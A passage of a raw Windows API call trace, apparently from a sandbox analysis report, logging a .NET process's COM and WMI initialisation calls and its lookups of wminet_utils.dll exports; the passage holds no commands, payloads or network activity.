Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877f074 | out: ppvObject=0x877f074*=0x73b0998) returned 0x0 [0132.640] WbemDefPath:IUnknown:Release (This=0x73b08f0) returned 0x0 [0132.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0998, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877ec94 | out: ppvObject=0x877ec94*=0x73b0998) returned 0x0 [0132.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0998, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x877ec50 | out: ppvObject=0x877ec50*=0x0) returned 0x80004002 [0132.640] WbemDefPath:IUnknown:AddRef (This=0x73b0998) returned 0x3 [0132.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0998, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x877e5ac | out: ppvObject=0x877e5ac*=0x0) returned 0x80004002 [0132.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0998, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x877e55c | out: ppvObject=0x877e55c*=0x0) returned 0x80004002 [0132.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0998, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877e568 | out: ppvObject=0x877e568*=0x76e270) returned 0x0 [0132.640] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x76e270, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x877e570 | out: pCid=0x877e570*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0132.640] WbemDefPath:IUnknown:Release (This=0x76e270) returned 0x3 [0132.641] CoGetContextToken (in: pToken=0x877e5c8 | out: pToken=0x877e5c8) returned 0x0 [0132.641] CoGetContextToken (in: pToken=0x877e9d0 | out: pToken=0x877e9d0) returned 0x0 [0132.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0998, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877ea60 | out: ppvObject=0x877ea60*=0x0) returned 0x80004002 [0132.641] WbemDefPath:IUnknown:Release (This=0x73b0998) returned 0x2 [0132.641] WbemDefPath:IUnknown:Release (This=0x73b0998) returned 0x1 [0132.641] SetEvent (hEvent=0x2b4) returned 1 [0133.675] CoGetClassObject (in: rclsid=0x76e9ec*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74c1d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x877ee48 | out: ppv=0x877ee48*=0x73b0b40) returned 0x0 [0133.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0b40, riid=0x74c50ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x877f060 | out: ppvObject=0x877f060*=0x0) returned 0x80004002 [0133.675] WbemDefPath:IClassFactory:CreateInstance (in: This=0x73b0b40, pUnkOuter=0x0, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877f074 | out: ppvObject=0x877f074*=0x73bca30) returned 0x0 [0133.675] WbemDefPath:IUnknown:Release (This=0x73b0b40) returned 0x0 [0133.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x73bca30, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877ec94 | out: ppvObject=0x877ec94*=0x73bca30) returned 0x0 [0133.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x73bca30, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x877ec50 | out: ppvObject=0x877ec50*=0x0) returned 0x80004002 [0133.675] WbemDefPath:IUnknown:AddRef (This=0x73bca30) returned 0x3 [0133.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x73bca30, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x877e5ac | out: ppvObject=0x877e5ac*=0x0) returned 0x80004002 [0133.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x73bca30, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x877e55c | out: ppvObject=0x877e55c*=0x0) returned 0x80004002 [0133.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x73bca30, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877e568 | out: ppvObject=0x877e568*=0x7a0708) returned 0x0 [0133.675] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7a0708, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x877e570 | out: pCid=0x877e570*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.676] WbemDefPath:IUnknown:Release (This=0x7a0708) returned 0x3 [0133.676] CoGetContextToken (in: pToken=0x877e5c8 | out: pToken=0x877e5c8) returned 0x0 [0133.676] CoGetContextToken (in: pToken=0x877e9d0 | out: pToken=0x877e9d0) returned 0x0 [0133.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x73bca30, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x877ea60 | out: ppvObject=0x877ea60*=0x0) returned 0x80004002 [0133.676] WbemDefPath:IUnknown:Release (This=0x73bca30) returned 0x2 [0133.676] WbemDefPath:IUnknown:Release (This=0x73bca30) returned 0x1 [0133.676] SetEvent (hEvent=0x31c) returned 1 Thread: id = 230 os_tid = 0x5b8 Thread: id = 231 os_tid = 0x598 Thread: id = 232 os_tid = 0x330 Thread: id = 233 os_tid = 0x340 [0132.647] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0132.647] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x8e0f20c | out: lpiid=0x8e0f20c) returned 0x0 [0132.648] CoGetClassObject (in: rclsid=0x76ea7c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74c1d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8e0ef20 | out: ppv=0x8e0ef20*=0x73b0928) returned 0x0 [0132.704] WbemLocator:IUnknown:QueryInterface (in: This=0x73b0928, riid=0x74c50ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8e0f138 | out: ppvObject=0x8e0f138*=0x0) returned 0x80004002 [0132.704] WbemLocator:IClassFactory:CreateInstance (in: This=0x73b0928, pUnkOuter=0x0, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0f14c | out: ppvObject=0x8e0f14c*=0x73b0b30) returned 0x0 [0132.704] WbemLocator:IUnknown:Release (This=0x73b0928) returned 0x0 [0132.704] WbemLocator:IUnknown:QueryInterface (in: This=0x73b0b30, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0ed6c | out: ppvObject=0x8e0ed6c*=0x73b0b30) returned 0x0 [0132.704] WbemLocator:IUnknown:QueryInterface (in: This=0x73b0b30, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8e0ed28 | out: ppvObject=0x8e0ed28*=0x0) returned 0x80004002 [0132.704] WbemLocator:IUnknown:AddRef (This=0x73b0b30) returned 0x3 [0132.704] WbemLocator:IUnknown:QueryInterface (in: This=0x73b0b30, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8e0e684 | out: ppvObject=0x8e0e684*=0x0) returned 0x80004002 [0132.704] WbemLocator:IUnknown:QueryInterface (in: This=0x73b0b30, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8e0e634 | out: ppvObject=0x8e0e634*=0x0) returned 0x80004002 [0132.704] WbemLocator:IUnknown:QueryInterface (in: This=0x73b0b30, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0e640 | out: ppvObject=0x8e0e640*=0x0) returned 0x80004002 [0132.704] CoGetContextToken (in: pToken=0x8e0e6a0 | out: pToken=0x8e0e6a0) returned 0x0 [0132.706] CoGetObjectContext (in: riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7876e4 | out: ppv=0x7876e4*=0x73c138) returned 0x0 [0132.707] CoGetContextToken (in: pToken=0x8e0eaa8 | out: pToken=0x8e0eaa8) returned 0x0 [0132.707] WbemLocator:IUnknown:QueryInterface (in: This=0x73b0b30, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0eb38 | out: ppvObject=0x8e0eb38*=0x0) returned 0x80004002 [0132.707] WbemLocator:IUnknown:Release (This=0x73b0b30) returned 0x2 [0132.707] WbemLocator:IUnknown:Release (This=0x73b0b30) returned 0x1 [0132.708] CoGetContextToken (in: pToken=0x8e0f118 | out: pToken=0x8e0f118) returned 0x0 [0132.708] CoGetContextToken (in: pToken=0x8e0f078 | out: pToken=0x8e0f078) returned 0x0 [0132.708] WbemLocator:IUnknown:QueryInterface (in: This=0x73b0b30, riid=0x8e0f148*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8e0f144 | out: ppvObject=0x8e0f144*=0x73b0b30) returned 0x0 [0132.708] WbemLocator:IUnknown:AddRef (This=0x73b0b30) returned 0x3 [0132.708] WbemLocator:IUnknown:Release (This=0x73b0b30) returned 0x2 [0132.712] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x73b0998, puCount=0x8e0f2dc | out: puCount=0x8e0f2dc*=0x2) returned 0x0 [0132.712] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=8, puBuffLength=0x8e0f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x8e0f2d8*=0xf, pszText=0x0) returned 0x0 [0132.712] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=8, puBuffLength=0x8e0f2d8*=0xf, pszText="00000000000000" | out: puBuffLength=0x8e0f2d8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0132.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x8e0e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0132.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x8e0ea60, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", lpUsedDefaultChar=0x0) returned 63 [0132.717] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x740e0000 [0132.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x8e0ea94, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1a\x1ftúWã¬\x94·tXíà\x08\x18\x99x", lpUsedDefaultChar=0x0) returned 13 [0132.786] GetProcAddress (hModule=0x740e0000, lpProcName="ResetSecurity") returned 0x740e24de [0132.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x8e0ea94, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0132.795] GetProcAddress (hModule=0x740e0000, lpProcName="SetSecurity") returned 0x740e2520 [0132.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x8e0ea90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 18 [0132.801] GetProcAddress (hModule=0x740e0000, lpProcName="BlessIWbemServices") returned 0x740e1c69 [0132.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x8e0ea88, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 24 [0132.822] GetProcAddress (hModule=0x740e0000, lpProcName="BlessIWbemServicesObject") returned 0x740e1cbb [0132.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x8e0ea90, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 17 [0132.845] GetProcAddress (hModule=0x740e0000, lpProcName="GetPropertyHandle") returned 0x740e21b4 [0132.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x8e0ea90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 18 [0132.854] GetProcAddress (hModule=0x740e0000, lpProcName="WritePropertyValue") returned 0x740e2617 [0132.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x8e0ea9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 5 [0132.863] GetProcAddress (hModule=0x740e0000, lpProcName="Clone") returned 0x740e1d0d [0132.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x8e0ea90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0132.869] GetProcAddress (hModule=0x740e0000, lpProcName="VerifyClientKey") returned 0x740e25b4 [0132.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x8e0ea90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0132.874] GetProcAddress (hModule=0x740e0000, lpProcName="GetQualifierSet") returned 0x740e2215 [0132.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x8e0ea9c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0132.875] GetProcAddress (hModule=0x740e0000, lpProcName="Get") returned 0x740e20d4 [0132.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x8e0ea9c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0132.889] GetProcAddress (hModule=0x740e0000, lpProcName="Put") returned 0x740e22be [0132.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x8e0ea9c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 6 [0132.901] GetProcAddress (hModule=0x740e0000, lpProcName="Delete") returned 0x740e1f31 [0132.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x8e0ea98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNamesD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 8 [0132.909] GetProcAddress (hModule=0x740e0000, lpProcName="GetNames") returned 0x740e2182 [0132.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x8e0ea90, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumerationD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 16 [0132.931] GetProcAddress (hModule=0x740e0000, lpProcName="BeginEnumeration") returned 0x740e1c43 [0132.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x8e0ea9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 4 [0132.937] GetProcAddress (hModule=0x740e0000, lpProcName="Next") returned 0x740e2283 [0132.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x8e0ea94, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 14 [0132.949] GetProcAddress (hModule=0x740e0000, lpProcName="EndEnumeration") returned 0x740e1fc2 [0132.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x8e0ea88, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0132.955] GetProcAddress (hModule=0x740e0000, lpProcName="GetPropertyQualifierSet") returned 0x740e21ff [0132.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x8e0ea9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 5 [0132.963] GetProcAddress (hModule=0x740e0000, lpProcName="Clone") returned 0x740e1d0d [0132.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x8e0ea94, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 13 [0132.964] GetProcAddress (hModule=0x740e0000, lpProcName="GetObjectText") returned 0x740e219e [0132.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x8e0ea90, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 17 [0132.973] GetProcAddress (hModule=0x740e0000, lpProcName="SpawnDerivedClass") returned 0x740e2566 [0132.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x8e0ea94, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 13 [0132.979] GetProcAddress (hModule=0x740e0000, lpProcName="SpawnInstance") returned 0x740e257c [0132.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x8e0ea98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTo\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 9 [0132.981] GetProcAddress (hModule=0x740e0000, lpProcName="CompareTo") returned 0x740e1d8d [0132.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x8e0ea90, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 17 [0132.996] GetProcAddress (hModule=0x740e0000, lpProcName="GetPropertyOrigin") returned 0x740e21e9 [0133.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x8e0ea94, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFromD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 12 [0133.007] GetProcAddress (hModule=0x740e0000, lpProcName="InheritsFrom") returned 0x740e2228 [0133.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x8e0ea98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethod\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 9 [0133.008] GetProcAddress (hModule=0x740e0000, lpProcName="GetMethod") returned 0x740e213a [0133.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x8e0ea98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethod\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 9 [0133.018] GetProcAddress (hModule=0x740e0000, lpProcName="PutMethod") returned 0x740e23da [0133.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x8e0ea94, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethodD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 12 [0133.028] GetProcAddress (hModule=0x740e0000, lpProcName="DeleteMethod") returned 0x740e1f44 [0133.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x8e0ea8c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumeration\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 22 [0133.029] GetProcAddress (hModule=0x740e0000, lpProcName="BeginMethodEnumeration") returned 0x740e1c56 [0133.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x8e0ea98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethod\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 10 [0133.031] GetProcAddress (hModule=0x740e0000, lpProcName="NextMethod") returned 0x740e22a2 [0133.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x8e0ea8c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 